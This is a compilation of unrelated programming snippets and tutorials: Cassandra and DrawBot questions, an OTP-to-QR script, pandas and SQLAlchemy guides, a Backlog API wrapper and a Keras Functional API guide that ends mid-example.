trace_on(...): Starts a trace to record computation graphs and profiling information.
write(...): Writes a generic summary to the default SummaryWriter if one exists.
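As a small illustration of a couple of the functions listed above (the log directory and values here are arbitrary):
import tensorflow as tf

writer = tf.summary.create_file_writer("/tmp/mylogs")
with writer.as_default():
    with tf.summary.record_if(True):  # explicitly enable summary recording
        tf.summary.histogram("weights", tf.random.normal([100]), step=0)
        tf.summary.text("note", "first step logged", step=0)
writer.flush()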
|
I have the following Cassandra table schema:
CREATE TABLE test (id text,stats frozen<map<text, text>> )
I created a Scala application to extract data from Cassandra; after some manipulation, the data will be updated back into Cassandra.
val result = session.execute("Select * from test where id= 'testid'")
val resultList = result.all()
val rows = resultList.iterator()
if (resultList.size() > 0) {
while (rows.hasNext()) {
val curRow = rows.next()
val ID = curRow.getString("id")
val statistics = curRow.getMap[String,String] ??????
}
}
A data row in the Cassandra table looks like this:
('testid',{'a1': '10', 'a2': '0', 'a3': '0', 'a4': '22', 'd1': '0', 'd2': '1', 'd3': '1', 'd4': '0', 'exb': '0', 'inb': '6', 'satno': '10'})
('id123',{'a1': '10', 'a2': '0', 'd1': '0', 'd2': '1', 'd3': '1', 'd4': '0'})
I want to map my stats field exactly into statistics. How should I do this? My fields in the stats column are dynamic: one row may contain 10 key-value pairs, while another row may contain 7 key-value pairs.
Thanks,
|
Problem with path closing
eduairet, last edited by gferreira
Hi everyone:
I'm making shapes using the arc tools and I'm having a problem at the intersection of two points:
This is the code I'm using; the reason I didn't use the oval tool is that I want to make random movements on every arc.
def shapePage(o=0, wd=1000, hg=1000, sWd=10, positive=True, cur = True, double=False):
hWd = wd / 2
hHg = hg / 2
hsWd = sWd / 2
def canvas():
newPage(wd, hg)
if positive is True:
fill(1)
if positive is False:
fill(0)
rect(o, o, wd, hg)
def blackShape():
path = BezierPath()
fill(None)
if positive is True:
stroke(0)
if positive is False:
stroke(1)
strokeWidth(sWd)
def shape(cur, radius=hWd):
points = [
[hWd, o + hsWd],
[wd - hsWd, o + hsWd],
[wd - hsWd, hHg],
[wd - hsWd, hg - hsWd],
[hWd, hg - hsWd],
[o + hsWd, hg - hsWd],
[o + hsWd, hHg],
[o + hsWd, o + hsWd],
[hWd, hHg]
]
while radius >= sWd * 2:
newsWd=sWd * 2
if cur is True:
path.moveTo(points[0])
path.arcTo(points[1], points[2], radius)
path.arcTo(points[3], points[4], radius)
path.arcTo(points[5], points[6], radius)
path.arcTo(points[7], points[0], radius)
if cur is False:
path.moveTo(points[0])
path.lineTo(points[1])
path.lineTo(points[2])
path.lineTo(points[3])
path.lineTo(points[4])
path.lineTo(points[5])
path.lineTo(points[6])
path.lineTo(points[7])
path.lineTo(points[0])
lineCap("butt")
#lineJoin("miter")
closePath()
drawPath(path=path)
for point in points:
if point[0] < hWd:
point[0] += newsWd
if point[0] > hWd:
point[0] -= newsWd
if point[0] == hWd:
point[0] = point[0]
if point[1] < hHg:
point[1] += newsWd
if point[1] > hHg:
point[1] -= newsWd
if point[1] == hHg:
point[1] = point[1]
radius -= newsWd
shape(cur)
if double is True:
shape(not cur)
canvas()
blackShape()
every arc is a separate contour in the path; what you see is the lineCap
eduairet, last edited by
Thank you @frederik! I was wondering if there's a way to access the curves of an oval(x, y, w, h)
gferreira, last edited by
hello @eduairet,
you can draw an oval using a
BezierPath, and then access its contours and points:
B = BezierPath()
B.oval(100, 100, 800, 800)
print(B.contours)
print(B.points)
print(B.onCurvePoints)
print(B.offCurvePoints)
cheers!
eduairet, last edited by
@gferreira great!!!! thank you very much.
|
#!/usr/bin/python
# Copyright 2013 Peter Palfrader
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import base64
import optparse
import subprocess
import sys
import urllib
parser = optparse.OptionParser()
parser.set_usage("%prog [options] [key]")
parser.add_option("-r", "--raw", dest="raw", default=False, action="store_true",
help="Encode just the base32 key, not an otpauth:// URL.")
parser.add_option("-n", "--name", dest="name",
help="Provide a name for this otpauth token.")
parser.add_option("-u", "--user", dest="user",
help="Provide a username for this otpauth token.")
parser.add_option("-b", "--base32", dest="base32", default=False, action="store_true",
help="Key already is in base32.")
parser.add_option("-v", "--verbose", dest="verbose", default=0, action="count",
help="Verbose output.")
(options, args) = parser.parse_args()
if len(args) >= 2:
parser.print_help()
sys.exit(1)
elif len(args) == 1:
hexkey = args[0]
else:
print "Enter key: ",
hexkey = sys.stdin.readline().rstrip()
if options.base32:
b32key = hexkey
else:
binkey = base64.b16decode(hexkey, True)
b32key = base64.b32encode(binkey)
if options.raw:
msg = b32key
else:
name = urllib.quote(options.name) if options.name is not None else 'token'
name += ':' + urllib.quote(options.user) if options.user is not None else ''
msg = "otpauth://totp/%s?secret=%s"%(name, b32key)
msg += '&issuer=%s'%(urllib.quote(options.name),) if options.name is not None else ''
if options.verbose > 0:
print msg
p = subprocess.Popen(['qrencode', '-s', '10', '-o', '-'], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
(out, dummy) = p.communicate(msg)
if p.returncode != 0:
raise Exception("qrencode failed.")
p = subprocess.Popen(['display'], stdin=subprocess.PIPE)
p.communicate(out)
if p.returncode != 0:
raise Exception("display failed (exitcode: %d)."%(p.returncode,))
|
I run into memory problems when processing very large dataframes.
The problem is that pandas uses the float64 and int64 numpy dtypes by default, even in cases where it is totally unnecessary (e.g. when you only have binary values). Furthermore, it is not even possible to change this default behaviour.
Hence, I wrote a function which finds the smallest possible dtype for a specific array.
import numpy as np
import pandas as pd
def safely_reduce_dtype(ser): # pandas.Series or numpy.array
orig_dtype = "".join([x for x in ser.dtype.name if x.isalpha()]) # float/int
mx = 1
for val in ser.values:
new_itemsize = np.min_scalar_type(val).itemsize
if mx < new_itemsize:
mx = new_itemsize
new_dtype = orig_dtype + str(mx * 8)
return new_dtype # or converts the pandas.Series by ser.astype(new_dtype)
So, e.g.:
>>> import pandas
>>> serie = pd.Series([1,0,1,0], dtype='int32')
>>> safely_reduce_dtype(serie)
'int8'
>>> float_serie = pd.Series([1.0, 0.0, 1.0, 0.0])
>>> safely_reduce_dtype(float_serie)
'float16'  # from float64
Using this, you can significantly reduce the size of your dataframe, by up to a factor of 4.
Update:
There is pd.to_numeric(series, downcast='float') since pandas 0.19. The above was written before it was released and can still be used with older versions.
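For example, a short sketch of the built-in downcast (the series here is arbitrary):
import pandas as pd

s = pd.Series([1.0, 0.0, 1.0, 0.0])         # float64 by default
small = pd.to_numeric(s, downcast='float')  # downcasts as far as possible, float32 here
print(small.dtype)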
|
I worked with Project Jupyter from December 2018 to March 2019 as part of an internship in the Outreachy program. It was a wonderful experience and I highly recommend it! During my internship, I wrestled with the SQLAlchemy library that JupyterHub uses internally.
Since I studied this library and had to do a lot of searching on Stack Overflow to understand various things, I decided to write this post to digest some of my questions and findings.
All the code is available in this repository.
Creating and understanding the Engine
To start working with SQLAlchemy, the first thing the tutorials teach is that you must create an engine. The engine is how SQLAlchemy communicates with the database. So, when creating the engine, you must provide the database URL, and that's basically it.
from sqlalchemy import create_engine

engine = create_engine('sqlite:///:memory:', echo=True)
Although you can access the database through engine commands (we'll see how), this generally isn't recommended. You can, but you shouldn't 🙂 The engine is meant to be just the connection bridge between Python and the database.
With this command, you are only telling SQLAlchemy where your database is located. The echo=True attribute makes SQLAlchemy log to the console every SQL statement it executes and the results obtained. This parameter should not stay enabled in production, ok?
Once your engine knows your database, it is easy to execute commands using a method called engine.execute(...). See the example below:
So you have a two-way street: the engine, which knows where your database is, and a method (engine.execute(...)) for changing the database through the engine:
Engine or connection?
I also saw in some tutorials that there is another way to execute SQL commands through the engine, which is through a connection. It goes like this:
conn = engine.connect()
conn.execute(...)
This lets us create transactional commands, meaning that all the commands must execute successfully against the database, or all must be rolled back on error [1]:
trans = conn.begin()
conn.execute('INSERT INTO "EX1" (name) '
             'VALUES ("Hello")')
trans.commit()
So the communication structure actually looks more like this:
However, as I kept investigating the differences between engine.execute(...) and connection.execute(...), I found that they are not really different:
"Using engine.execute() and connection.execute() is (almost) the same thing. In the first, the connection object is created implicitly, and in the second we instantiate it explicitly."
So feel free to use either one, if you want :)
So far, we've connected to the database and been able to execute commands through SQL statements. However, what makes SQLAlchemy so attractive is the ORM (Object Relational Mapping), which I haven't covered yet.
The ORM needs a session to mediate between the objects we create in Python and the engine that actually communicates with the database. Let's use a function called sessionmaker to pass the engine to our current session and actually create the session:
from sqlalchemy.orm import sessionmaker

Session = sessionmaker(bind=engine)
session = Session()
From here on, we'll use the session to talk to the tables and run queries, but it is the engine that actually applies things to your database.
Although it may seem confusing to have three entities before even starting to work with tables, most of the time after the initial setup you will use the session far more than the engine, and the connection will be made implicitly by it.
Creating tables
Now that we understand the basic structure, the first thing to do is start creating tables in our database and finally take a look at SQLAlchemy's ORM.
To create new tables, we need to create classes that contain attributes. Each class will be a table in our database, and each attribute will be a column in that table. To map which table in the database relates to each class in our files, we use a SQLAlchemy system called Declarative. To use it, the first thing we must do is instantiate a Base:
from sqlalchemy.ext.declarative import declarative_base

Base = declarative_base()
Now let's create a User class that inherits from the declarative Base we just created. We'll give our class just three attributes: an id (which is a primary key), a name, and a password. Since we are using Declarative, we must add at least two things to our class:
__tablename__ indicates what the table will actually be called inside the database
At least one of the attributes must be declared as a primary key [2].
It's also good to add an optional method called __repr__, which returns the string shown when we print an instance of the User class.
from sqlalchemy import Column, Integer, String

class User(Base):
    __tablename__ = 'users'

    id = Column(Integer, primary_key=True)
    name = Column(String)
    password = Column(String)

    def __repr__(self):
        return f'User {self.name}'
We now have a class describing what our table should look like in the database. However, nothing has changed so far: the database doesn't know about this structure yet. To actually create the tables in our database following the structure defined in the User class, we need the declarative Base we just created and the engine:
Base.metadata.create_all(engine)
Only at this moment does SQLAlchemy actually apply the changes to the database. Since we set the echo parameter to True, we can see exactly which SQL statements the engine is generating:
Adding new users
Now that the table actually exists in the database, we can use the class to create a new record. We can use the User class to create a new user and session.add(...) to add the instance to our database as a new row.
user = User(name='John Snow', password='johnspassword')
session.add(user)

print(user.id)  # None
Earlier I said we always need a primary key, but in the example above I didn't pass one to the model. If I try to print the id of the user I just created, it returns None.
That's because session.add only registers the transactions we want performed; it doesn't actually change anything in the database [3].
As explained at this link, there are two operations that can be performed here (see the sketch after this list):
session.flush() communicates a series of operations to the database (insert, update, delete). The database keeps them as pending operations in a transaction. The changes are not persisted to disk or visible to other transactions until the database receives a COMMIT for the current transaction (which is what session.commit() does).
or
session.commit() persists the changes to the database. This command always calls session.flush() as part of it.
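A minimal sketch of the difference, reusing the User model and session from above (the example user is hypothetical):
user = User(name='Arya', password='aryaspassword')  # hypothetical example user
session.add(user)
print(user.id)    # None: nothing has been sent to the database yet

session.flush()   # sends the INSERT inside the open transaction
print(user.id)    # now populated by the database

session.commit()  # makes the change permanent (commit flushes first)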
Making queries
Once we have records in the database, we need to access them :)
For that, we can use the query method on our session. The method takes as a parameter the class representing the database table we want to search. We then use the filter_by method to search for a value in one of the columns (or class attributes):
query = session.query(User).filter_by(name='John')
Finally, we chain a method indicating what we want to do with this query: count the number of records found (.count()), return all the records found (.all()), return only the first record (.first()), and so on:
query.count()
Another way to do this search is to use the filter method instead of filter_by, which has a slightly different syntax:
session.query(User).filter(User.name=='John').first()
With the filter method, you can also search not only for exact strings but for parts of strings:
session.query(User).filter(User.name.like('%John%')).first()
In JupyterHub, each model was given a class method that simplifies this rather convoluted syntax. Here we create a classmethod that only needs to receive the session and can run the search in a simpler way. The method is written like this:
class User(Base):
    ...

    @classmethod
    def find_by_name(cls, session, name):
        return session.query(cls).filter_by(name=name).all()
And the search for users named John becomes simpler:
User.find_by_name(session, 'John')
Adding tables after initializing the database with create_all
One of the problems I had while working with Project Jupyter is that I needed to create a new table on a database and engine that already existed, i.e. after Base.metadata.create_all(engine).
So imagine that I now want a Product table like the following:
from sqlalchemy import Column, Integer, String

class Product(Base):
    __tablename__ = 'products'

    id = Column(Integer, primary_key=True)
    name = Column(String)
The simplest way I found to create this new table in the database was:
Product.__table__.create(engine)
Creating a foreign key relationship
Imagine you would like to connect each product to a user in your system, so that each instance of the Product class stores an instance of the User class:
If you are creating all the tables now, add a Column as an attribute of your Product class and indicate that this attribute references the User class, storing its id attribute as the foreign key:
from sqlalchemy import Column, ForeignKey, Integer, String
from sqlalchemy.orm import relationship

class Product(Base):
    __tablename__ = 'product'

    id = Column(Integer, primary_key=True)
    name = Column(String)
    user_id = Column(Integer, ForeignKey('user.id'))
    user = relationship('User')
Now we need to go to the User class and add this relationship with Product, so that it is possible to access the products tied to a user:
from sqlalchemy import Column, Integer, String
from sqlalchemy.orm import relationship

class User(Base):
    __tablename__ = 'user'  # if you use Base it is obligatory

    id = Column(Integer, primary_key=True)  # obligatory
    name = Column(String)
    password = Column(String)
    products = relationship(Product, backref="users")
You can create the tables using the Base.metadata.create_all(engine) we saw earlier. And now you can create a user and a product related to each other like this:
user = User(name='John')
product = Product(name='wolf', user=user)
session.add_all([user, product])
session.commit()
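A quick illustrative check that the relationship works in both directions (using the attribute names defined above):
product.user.name  # 'John'
user.products      # the list of John's products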
And that's it 🙂
❤ Hugs! Leticia
|
At our company we use Nulab's Backlog as the project management tool across the whole organization, and we keep running into scenarios where the API would come in handy: bulk-registering internal training assignments or customer interview tasks, migrating a wiki created in an old project to a new project, and so on.
As a tool for those situations, I wrote a very simple Python wrapper, which I'd like to introduce here.
* For details, see the PyPI project page or the GitHub repository below.
Usage
The package is registered on PyPI under the name python-backlog and can be installed with the following command:
pip install python-backlog
backlog.base.BacklogAPI is the API object; it takes space and api_key as arguments.
As also noted in the README, you can pull the authentication settings from a YAML file with backlog.util.load_conf() (implementing this introduced a dependency on PyYAML that has nothing to do with the core functionality; at the time of writing I don't feel great about that dependency, and it may be removed in the future).
from backlog.util import load_conf
from backlog.base import BacklogAPI
conf = load_conf("conf.yml")["backlog"]
api = BacklogAPI(conf["space"], conf["api_key"])
For example, if you want the list of wikis, you write the following:
import json
# list wikis
wikis = api.wiki.list("SampleProject")
print(json.dumps(wikis[0], indent=2))
Under the API client object there is a namespace for each Backlog resource; operations related to a resource, such as listing wikis, are used as method calls on that namespace, e.g. backlog_client.wiki.list(). The parameter specifications follow Backlog's API reference.
Each method's docstring includes a link to the corresponding Backlog API reference, so if you want to check which parameters a method expects, refer to the docstring of that method.
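Since the docstrings carry those reference links, Python's built-in help() is a quick way to read them, e.g.:
help(api.wiki.list)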
Notes
It assumes macOS (or Linux) + Python 3.6; it (probably) won't work on Python 2.x.
It probably won't run on Windows either; for now I think using it in a Docker environment is the way to go.
Many resources are still unsupported: either the resource object itself is undefined, or the method is specified to raise NotImplemented and fail.
Summary
This was my first time going all the way to publishing a self-made package on PyPI, and I learned a lot from it. It's still a beta version, but I'd be delighted if you gave it a try.
The final form I have in mind is a CLI tool that wraps this further; it is, of course, under development (though I've been slacking off lately).
I imagine it being usable something like this:
# List the wikis under a given project
backlog wiki ls --project xxx
# Migrate the wikis under project A to project B
backlog wiki cp backlog://project-A/* backlog://project-B/
In any case, I hope you'll give python-backlog a try.
|
Tried the Python code above on my modern PC (after modifying the print command for Python 3.4), so this:
Code: Select all
import time
x = 0
def doit1(i):
global x
x = x + i
list = range(100000)
t = time.time()
for i in list:
doit1(i)
print ("%.3f" % (time.time()-t))
and it came out at 0.03 s, which is about 20 times faster than the Pi's 0.595 seconds.
Seems reasonable to me; Python isn't that fast! And a Pi being twenty times slower than a modern PC seems a good estimate of the Pi's speed.
1 second just to count to 100,000? That was acceptable in the 1990s, but not today, IMO.
In defense of Python: the above code is not simply counting to 100,000. This code does it better, modified for 1,000,000 since otherwise it finished too fast!
Code: Select all
import time
list = 1000000
t = time.time()
i = 1
while i < list:
i = i+1
print ("%.3f" % (time.time()-t))
That code scored 0.15 seconds on my PC.
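As an aside, the timeit module usually gives steadier numbers than timing a single run by hand; a minimal sketch:
Code: Select all
import timeit
print("%.3f" % timeit.timeit("i = i + 1", setup="i = 0", number=1000000))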
By the way, which Pi are you using?
|
Setup
import tensorflow as tf
tf.keras.backend.clear_session()  # Simple reset
Introduction
You are already familiar with using keras.Sequential() to create models. The Functional API is a way to create more flexible models than Sequential: it can handle models with non-linear topology, models with shared layers, and models with multiple inputs or outputs.
It is based on the idea that a deep learning model is usually a directed acyclic graph (DAG) of layers. The Functional API is a set of tools for building graphs of layers.
Consider the following model:
(input: 784-dimensional vectors)
↧
[Dense (64 units, relu activation)]
↧
[Dense (64 units, relu activation)]
↧
[Dense (10 units, softmax activation)]
↧
(output: probability distribution over 10 classes)
It is a simple graph of three layers.
To build this model with the Functional API, you would start by creating an input node:
from tensorflow import keras
inputs = keras.Input(shape=(784,))
Here we only specify the shape of our data: 784-dimensional vectors. Note that the batch size is always omitted; only the shape of each sample is given. For an image-type input of shape (32, 32, 3), it would have been:
img_inputs = keras.Input(shape=(32, 32, 3))
What gets returned, inputs, contains information about the shape and dtype of the data you expect to feed into your model:
inputs.shape
TensorShape([None, 784])
inputs.dtype
tf.float32
You can create a new node in the graph of layers by calling a layer on this inputs object:
from tensorflow.keras import layers
dense = layers.Dense(64, activation='relu')
x = dense(inputs)
The "layer call" action is like drawing an arrow from "inputs" to the layer we created: we are "passing" the inputs to the dense layer, and we get x as the output.
Let's add a few more layers to our graph of layers:
x = layers.Dense(64, activation='relu')(x)
outputs = layers.Dense(10, activation='softmax')(x)
At this point, we can create a Model by specifying its inputs and outputs in the graph of layers:
model = keras.Model(inputs=inputs, outputs=outputs)
To recap, here is the full model definition:
inputs = keras.Input(shape=(784,), name='img')
x = layers.Dense(64, activation='relu')(inputs)
x = layers.Dense(64, activation='relu')(x)
outputs = layers.Dense(10, activation='softmax')(x)
model = keras.Model(inputs=inputs, outputs=outputs, name='mnist_model')
Let's see what the model summary looks like:
model.summary()
Model: "mnist_model" _________________________________________________________________ Layer (type) Output Shape Param # ================================================================= img (InputLayer) [(None, 784)] 0 _________________________________________________________________ dense_3 (Dense) (None, 64) 50240 _________________________________________________________________ dense_4 (Dense) (None, 64) 4160 _________________________________________________________________ dense_5 (Dense) (None, 10) 650 ================================================================= Total params: 55,050 Trainable params: 55,050 Non-trainable params: 0 _________________________________________________________________
We can also plot the model as a graph:
keras.utils.plot_model(model, 'my_first_model.png')
And, optionally, display the input and output shapes of each layer in the plotted graph:
keras.utils.plot_model(model, 'my_first_model_with_shape_info.png', show_shapes=True)
This figure and the code we wrote are virtually identical. In the code version, the connection arrows are simply replaced by the call operation.
A "graph of layers" is a very intuitive mental image for a deep learning model, and the Functional API is a way to create models that closely mirror this mental image.
Training, evaluation, and inference
Training, evaluation, and inference work exactly the same way for models built with the Functional API as for Sequential models.
Here is a quick demonstration.
Here we load the MNIST image data, reshape it into vectors, fit the model on the data (while monitoring performance on a validation split), and finally evaluate our model on the test data:
(x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data()
x_train = x_train.reshape(60000, 784).astype('float32') / 255
x_test = x_test.reshape(10000, 784).astype('float32') / 255
model.compile(loss='sparse_categorical_crossentropy',
optimizer=keras.optimizers.RMSprop(),
metrics=['accuracy'])
history = model.fit(x_train, y_train,
batch_size=64,
epochs=5,
validation_split=0.2)
test_scores = model.evaluate(x_test, y_test, verbose=2)
print('Test loss:', test_scores[0])
print('Test accuracy:', test_scores[1])
Epoch 1/5 750/750 [==============================] - 2s 2ms/step - loss: 0.3558 - accuracy: 0.8995 - val_loss: 0.1930 - val_accuracy: 0.9440 Epoch 2/5 750/750 [==============================] - 2s 2ms/step - loss: 0.1724 - accuracy: 0.9482 - val_loss: 0.1452 - val_accuracy: 0.9563 Epoch 3/5 750/750 [==============================] - 2s 2ms/step - loss: 0.1251 - accuracy: 0.9624 - val_loss: 0.1184 - val_accuracy: 0.9656 Epoch 4/5 750/750 [==============================] - 2s 2ms/step - loss: 0.0997 - accuracy: 0.9705 - val_loss: 0.1127 - val_accuracy: 0.9668 Epoch 5/5 750/750 [==============================] - 2s 2ms/step - loss: 0.0824 - accuracy: 0.9756 - val_loss: 0.1073 - val_accuracy: 0.9698 313/313 - 0s - loss: 0.1017 - accuracy: 0.9701 Test loss: 0.1017443984746933 Test accuracy: 0.9700999855995178
For a complete guide on model training and evaluation, see the Training and Evaluation guide.
Saving and serialization
Saving and serialization work exactly the same way for models built with the Functional API as for Sequential models.
A standard way to save a Functional model is to call model.save() to save the whole model into a single file. You can later recreate the same model from this file, even if you no longer have access to the code that created it.
This file includes:
The model's architecture
The model's weight values (which were learned during training)
The model's training config (what you passed to compile), if any
The optimizer and its state, if any (this lets you restart training where you left off)
model.save('path_to_my_model.h5')
del model
# Recreate the exact same model, from the file:
model = keras.models.load_model('path_to_my_model.h5')
For a complete guide on saving models, see the Saving and Serializing Models guide.
Using the same graph of layers to define multiple models
In the Functional API, models are created by specifying their inputs and outputs in a graph of layers. That means a single graph of layers can be used to generate multiple models.
In the example below, we use the same stack of layers to instantiate two models: an "encoder" model that turns image inputs into 16-dimensional vectors, and an end-to-end "autoencoder" model for training.
encoder_input = keras.Input(shape=(28, 28, 1), name='img')
x = layers.Conv2D(16, 3, activation='relu')(encoder_input)
x = layers.Conv2D(32, 3, activation='relu')(x)
x = layers.MaxPooling2D(3)(x)
x = layers.Conv2D(32, 3, activation='relu')(x)
x = layers.Conv2D(16, 3, activation='relu')(x)
encoder_output = layers.GlobalMaxPooling2D()(x)
encoder = keras.Model(encoder_input, encoder_output, name='encoder')
encoder.summary()
x = layers.Reshape((4, 4, 1))(encoder_output)
x = layers.Conv2DTranspose(16, 3, activation='relu')(x)
x = layers.Conv2DTranspose(32, 3, activation='relu')(x)
x = layers.UpSampling2D(3)(x)
x = layers.Conv2DTranspose(16, 3, activation='relu')(x)
decoder_output = layers.Conv2DTranspose(1, 3, activation='relu')(x)
autoencoder = keras.Model(encoder_input, decoder_output, name='autoencoder')
autoencoder.summary()
Model: "encoder" _________________________________________________________________ Layer (type) Output Shape Param # ================================================================= img (InputLayer) [(None, 28, 28, 1)] 0 _________________________________________________________________ conv2d (Conv2D) (None, 26, 26, 16) 160 _________________________________________________________________ conv2d_1 (Conv2D) (None, 24, 24, 32) 4640 _________________________________________________________________ max_pooling2d (MaxPooling2D) (None, 8, 8, 32) 0 _________________________________________________________________ conv2d_2 (Conv2D) (None, 6, 6, 32) 9248 _________________________________________________________________ conv2d_3 (Conv2D) (None, 4, 4, 16) 4624 _________________________________________________________________ global_max_pooling2d (Global (None, 16) 0 ================================================================= Total params: 18,672 Trainable params: 18,672 Non-trainable params: 0 _________________________________________________________________ Model: "autoencoder" _________________________________________________________________ Layer (type) Output Shape Param # ================================================================= img (InputLayer) [(None, 28, 28, 1)] 0 _________________________________________________________________ conv2d (Conv2D) (None, 26, 26, 16) 160 _________________________________________________________________ conv2d_1 (Conv2D) (None, 24, 24, 32) 4640 _________________________________________________________________ max_pooling2d (MaxPooling2D) (None, 8, 8, 32) 0 _________________________________________________________________ conv2d_2 (Conv2D) (None, 6, 6, 32) 9248 _________________________________________________________________ conv2d_3 (Conv2D) (None, 4, 4, 16) 4624 _________________________________________________________________ global_max_pooling2d (Global (None, 16) 0 _________________________________________________________________ reshape (Reshape) (None, 4, 4, 1) 0 _________________________________________________________________ conv2d_transpose (Conv2DTran (None, 6, 6, 16) 160 _________________________________________________________________ conv2d_transpose_1 (Conv2DTr (None, 8, 8, 32) 4640 _________________________________________________________________ up_sampling2d (UpSampling2D) (None, 24, 24, 32) 0 _________________________________________________________________ conv2d_transpose_2 (Conv2DTr (None, 26, 26, 16) 4624 _________________________________________________________________ conv2d_transpose_3 (Conv2DTr (None, 28, 28, 1) 145 ================================================================= Total params: 28,241 Trainable params: 28,241 Non-trainable params: 0 _________________________________________________________________
Note that we make the decoding architecture strictly symmetrical to the encoding architecture, so that we get an output shape that matches the input shape (28, 28, 1). The reverse of a Conv2D layer is a Conv2DTranspose layer, and the reverse of a MaxPooling2D layer is an UpSampling2D layer.
All models are callable, just like layers
You can treat any model as if it were a layer, by calling it on an Input or on the output of another layer. Note that by calling a model you aren't just reusing the model's architecture, you are also reusing its weights.
Let's see this in action. Here is a different take on the autoencoder example that creates an encoder model and a decoder model, and chains them in two calls to obtain the autoencoder model:
encoder_input = keras.Input(shape=(28, 28, 1), name='original_img')
x = layers.Conv2D(16, 3, activation='relu')(encoder_input)
x = layers.Conv2D(32, 3, activation='relu')(x)
x = layers.MaxPooling2D(3)(x)
x = layers.Conv2D(32, 3, activation='relu')(x)
x = layers.Conv2D(16, 3, activation='relu')(x)
encoder_output = layers.GlobalMaxPooling2D()(x)
encoder = keras.Model(encoder_input, encoder_output, name='encoder')
encoder.summary()
decoder_input = keras.Input(shape=(16,), name='encoded_img')
x = layers.Reshape((4, 4, 1))(decoder_input)
x = layers.Conv2DTranspose(16, 3, activation='relu')(x)
x = layers.Conv2DTranspose(32, 3, activation='relu')(x)
x = layers.UpSampling2D(3)(x)
x = layers.Conv2DTranspose(16, 3, activation='relu')(x)
decoder_output = layers.Conv2DTranspose(1, 3, activation='relu')(x)
decoder = keras.Model(decoder_input, decoder_output, name='decoder')
decoder.summary()
autoencoder_input = keras.Input(shape=(28, 28, 1), name='img')
encoded_img = encoder(autoencoder_input)
decoded_img = decoder(encoded_img)
autoencoder = keras.Model(autoencoder_input, decoded_img, name='autoencoder')
autoencoder.summary()
Model: "encoder" _________________________________________________________________ Layer (type) Output Shape Param # ================================================================= original_img (InputLayer) [(None, 28, 28, 1)] 0 _________________________________________________________________ conv2d_4 (Conv2D) (None, 26, 26, 16) 160 _________________________________________________________________ conv2d_5 (Conv2D) (None, 24, 24, 32) 4640 _________________________________________________________________ max_pooling2d_1 (MaxPooling2 (None, 8, 8, 32) 0 _________________________________________________________________ conv2d_6 (Conv2D) (None, 6, 6, 32) 9248 _________________________________________________________________ conv2d_7 (Conv2D) (None, 4, 4, 16) 4624 _________________________________________________________________ global_max_pooling2d_1 (Glob (None, 16) 0 ================================================================= Total params: 18,672 Trainable params: 18,672 Non-trainable params: 0 _________________________________________________________________ Model: "decoder" _________________________________________________________________ Layer (type) Output Shape Param # ================================================================= encoded_img (InputLayer) [(None, 16)] 0 _________________________________________________________________ reshape_1 (Reshape) (None, 4, 4, 1) 0 _________________________________________________________________ conv2d_transpose_4 (Conv2DTr (None, 6, 6, 16) 160 _________________________________________________________________ conv2d_transpose_5 (Conv2DTr (None, 8, 8, 32) 4640 _________________________________________________________________ up_sampling2d_1 (UpSampling2 (None, 24, 24, 32) 0 _________________________________________________________________ conv2d_transpose_6 (Conv2DTr (None, 26, 26, 16) 4624 _________________________________________________________________ conv2d_transpose_7 (Conv2DTr (None, 28, 28, 1) 145 ================================================================= Total params: 9,569 Trainable params: 9,569 Non-trainable params: 0 _________________________________________________________________ Model: "autoencoder" _________________________________________________________________ Layer (type) Output Shape Param # ================================================================= img (InputLayer) [(None, 28, 28, 1)] 0 _________________________________________________________________ encoder (Functional) (None, 16) 18672 _________________________________________________________________ decoder (Functional) (None, 28, 28, 1) 9569 ================================================================= Total params: 28,241 Trainable params: 28,241 Non-trainable params: 0 _________________________________________________________________
As you can see, models can be nested: a model can contain submodels (since a model is just like a layer).
A common use case for model nesting is *ensembling*. As an example, here's how to ensemble a set of models into a single model that averages their predictions:
def get_model():
inputs = keras.Input(shape=(128,))
outputs = layers.Dense(1, activation='sigmoid')(inputs)
return keras.Model(inputs, outputs)
model1 = get_model()
model2 = get_model()
model3 = get_model()
inputs = keras.Input(shape=(128,))
y1 = model1(inputs)
y2 = model2(inputs)
y3 = model3(inputs)
outputs = layers.average([y1, y2, y3])
ensemble_model = keras.Model(inputs=inputs, outputs=outputs)
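As a quick sanity check of the wiring (the input here is dummy data, purely illustrative), the ensemble can be called like any other model:
import numpy as np
x = np.random.random((4, 128)).astype('float32')
y = ensemble_model.predict(x)  # averaged predictions, shape (4, 1)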
Manipulating complex graph topologies
Models with multiple inputs and outputs
The Functional API makes it easy to manipulate multiple inputs and outputs. This cannot be handled with the Sequential API.
Here is a simple example.
Suppose you are building a system for ranking customer issue tickets by priority and routing them to the correct department.
Your model will have 3 inputs:
Title of the ticket (text input)
Text body of the ticket (text input)
Any tags added by the user (categorical input)
It will have two outputs:
Priority score between 0 and 1 (scalar sigmoid output)
The department that should handle the ticket (softmax output over the set of departments)
Let's build this model in a few lines with the Functional API.
num_tags = 12  # Number of unique issue tags
num_words = 10000  # Size of vocabulary obtained when preprocessing text data
num_departments = 4  # Number of departments for predictions
title_input = keras.Input(shape=(None,), name='title')  # Variable-length sequence of ints
body_input = keras.Input(shape=(None,), name='body')  # Variable-length sequence of ints
tags_input = keras.Input(shape=(num_tags,), name='tags')  # Binary vectors of size `num_tags`
# Embed each word in the title into a 64-dimensional vector
title_features = layers.Embedding(num_words, 64)(title_input)
# Embed each word in the body into a 64-dimensional vector
body_features = layers.Embedding(num_words, 64)(body_input)
# Reduce the sequence of embedded words in the title into a single 128-dimensional vector
